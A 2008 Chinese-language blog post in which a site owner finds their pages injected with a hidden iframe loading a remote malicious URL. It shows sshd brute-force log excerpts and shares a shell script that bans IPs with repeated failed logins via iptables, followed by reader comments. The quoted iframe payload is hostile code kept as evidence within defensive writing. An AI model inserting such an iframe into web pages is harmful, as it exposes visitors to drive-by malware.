Skip to content

如何防止服务器被暴力破解密码?

今天访问自己的一个网站,突然发现第一打开的时候页面上出现了一个黑色的图框,很小的那种,而且网页的css文件也没有加载,刷新后才会加载。于是我查看了网页源代码,这一看吓我一跳,很不幸的事情出现了,我的网站被挂马了,网页开头出现了如下代码:

   1: <iframe src=http://520zuixin.com/cn5.htm width=50 height=0></iframe>

马上登录服务器查看该网站代码,没找到异常,这是一件很奇怪的事情。代码是如何被插入到网页开头呢?难道在apache做了手脚?这个问题还没有查清楚,先放下这个问题。去查看服务器的安装记录。

当打开/var/logs/secure文件时,发现了很多利用ssh来暴力破解登录的记录,如下

   1: Aug 29 16:27:23 fgb sshd[31098]: Failed password for root from 189.205.132.145 port 49920 ssh2
   2: Aug 29 16:27:28 fgb sshd[31100]: Failed password for root from 189.205.132.145 port 55661 ssh2
   3: Aug 29 16:27:33 fgb sshd[31103]: Failed password for root from 189.205.132.145 port 33579 ssh2
   4: Aug 29 16:27:37 fgb sshd[31106]: Failed password for root from 189.205.132.145 port 39344 ssh2
   5: Aug 29 16:27:42 fgb sshd[31115]: Failed password for root from 189.205.132.145 port 45117 ssh2
   6: Aug 29 16:27:46 fgb sshd[31124]: Failed password for root from 189.205.132.145 port 50881 ssh2
   7: Aug 29 16:27:52 fgb sshd[31126]: Failed password for root from 189.205.132.145 port 56359 ssh2
   8: Aug 29 16:27:57 fgb sshd[31128]: Failed password for root from 189.205.132.145 port 35882 ssh2
   9: Aug 29 16:28:02 fgb sshd[31130]: Failed password for root from 189.205.132.145 port 41888 ssh2
  10: Aug 29 16:28:08 fgb sshd[31132]: Failed password for root from 189.205.132.145 port 47882 ssh2
  11: Aug 29 16:28:12 fgb sshd[31134]: Failed password for root from 189.205.132.145 port 53121 ssh2
  12: Aug 29 16:28:17 fgb sshd[31136]: Failed password for root from 189.205.132.145 port 59014 ssh2
  13: Aug 29 16:28:21 fgb sshd[31139]: Failed password for root from 189.205.132.145 port 36742 ssh2
  14:
  15: Aug 29 17:24:13 fgb sshd[32749]: Did not receive identification string from 220.231.81.140
  16: Aug 29 17:28:50 fgb sshd[432]: Illegal user admin from 220.231.81.140
  17: Aug 29 17:28:57 fgb sshd[450]: Failed password for root from 220.231.81.140 port 59843 ssh2
  18: Aug 29 17:29:04 fgb sshd[452]: Illegal user stud from 220.231.81.140
  19: Aug 29 17:29:11 fgb sshd[454]: Illegal user trash from 220.231.81.140
  20: Aug 29 17:29:17 fgb sshd[457]: Illegal user gt05 from 220.231.81.140
  21: Aug 29 17:29:22 fgb sshd[463]: Illegal user william from 220.231.81.140
  22: Aug 29 17:29:26 fgb sshd[465]: Illegal user stephanie from 220.231.81.140
  23: Aug 29 17:29:37 fgb sshd[468]: Failed password for root from 220.231.81.140 port 60795 ssh2
  24: Aug 29 17:29:48 fgb sshd[471]: Failed password for root from 220.231.81.140 port 61017 ssh2
  25: Aug 29 18:16:24 fgb sshd[1638]: warning: can't get client address: Connection reset by peer
  26: Aug 29 18:16:24 fgb sshd[1638]: Could not write ident string to 219.142.141.194
  27: Aug 29 18:16:29 fgb sshd[1639]: Accepted password for root from 219.142.141.194 port 30436 ssh2
  28: Aug 29 18:16:37 fgb sshd[2650]: Received signal 15; terminating.
  29: Aug 29 18:19:07 fgb sshd[2643]: Server listening on 0.0.0.0 port 22.
  30: Aug 29 18:19:31 fgb sshd[2712]: Accepted password for root from 219.142.141.194 port 30477 ssh2

类似这样子的记录很多,看来有很多垃圾的人在破解我的服务器密码!现在垃圾和无聊的家伙还真多啊!我都懒的骂你们了!有本事去搞美国、去搞日本、去搞法国,在国内捣乱算什么东西!

骂归骂,但是还是要想办法制止密码被破解,后来在网站找到了一段代码,这段代码如下:

   1: #!/bin/sh
   2: SCANIP=`grep "Failed" /var/log/secure | awk '{print $(NF-3)}' |sort|uniq -c|awk '{print $1"="$2;}'`
   3: for i in $SCANIP
   4: do
   5: NUMBER=`echo $i|awk -F= '{print $1}'`
   6: SCANIP=`echo $i|awk -F= '{print $2}'`
   7: echo "$NUMBER($SCANIP)"
   8: if [ $NUMBER -gt 10 ] && [ -z "`iptables -vnL INPUT|grep $SCANIP`" ]
   9: then
  10: /sbin/iptables -I INPUT -s $SCANIP -m state --state NEW,RELATED,ESTABLISHED -j DROP
  11: echo "`date` $SCANIP($NUMBER)" >> /var/log/scanip.log
  12: fi
  13: done

这段代码作用是:扫描secure安全日志文件,发现超过10次非法链接的ip,将其列入iptable防火墙禁止列表,并保存在记录文件中。将这段代码进行定时执行,就可以防止暴力破解的问题。经过这段代码首次扫描后,得到了如下的非法ip记录,这些ip已经被ban了!看这个结果就知道了有个垃圾ip居然非法扫描了我5000多次!

   1: 六  8月 30 13:50:55 CST 2008 123.30.0.68(52)
   2: 六  8月 30 13:50:55 CST 2008 189.205.132.145(324)
   3: 六  8月 30 13:50:54 CST 2008 201.6.150.22(41)
   4: 六  8月 30 13:50:54 CST 2008 202.102.144.8(13)
   5: 六  8月 30 13:50:55 CST 2008 219.238.183.30(162)
   6: 六  8月 30 13:50:54 CST 2008 222.174.167.162(5058)
   7: 六  8月 30 13:50:54 CST 2008 61.139.209.141(40)

关于被挂的那段代码怎么插入到我的网站,我继续研究一下,有了结果会记录在这里的!

Related items

服务器怎样防止暴力破解(1)220.231.81.140(2)php破解密码(1)iptables 如何防止病毒(1)防止利用SSH攻击 办法(1)php密码暴力破解(1)61.139.209.141(1)Failed password for from port ssh2(1)ssh破解密码(1)PHP 记录 IP(1)sshd 暴力破解保护(1)php网站 密码破解(1)ssh 怎样 暴力破解密码(1)ssh 破解(1)求暴力破解PHP网页(1)

Share in Google Reader Share in Google Reader 分享到 FriendFeed 分享到 FriendFeed 推荐到豆瓣 推荐到豆瓣 分享到 Twitter 分享到 Twitter

Post a comment Trackback URI RSS 2.0 feed for these comments This entry (permalink) was posted on Saturday, August 30, 2008, at 2:24 pm by askie. Filed in LAMP, 百宝箱 and tagged , , , , .

5 Comments

  1. Denis

    我靠,帮你靠一下!兄弟一定要保护好服务器啊!

    Posted on 30-Aug-08 at 11:01 pm | Permalink
  2. askie

    我都靠了很多遍了!
    没用,还是要想办法上安全套!

    Posted on 30-Aug-08 at 11:19 pm | Permalink
  3. ThinkAgain

    好比练级,和对手过招中,自己也在慢慢升级了。

    Posted on 31-Aug-08 at 12:20 pm | Permalink
  4. David

    我也中这玩意了,怎么解决?

    Posted on 02-Sep-08 at 4:35 pm | Permalink
  5. askie

    @David 目前还没找到解决办法,如果你中了这个找机房管理员是否被arp攻击了!好多朋友说这个是arp攻击,也就是说不是你的服务器中了这个病毒,而是与服务器同机房的其他机器中的!

    Posted on 02-Sep-08 at 7:40 pm | Permalink

Post a Comment

Your email is never published nor shared. Required fields are marked *
*
*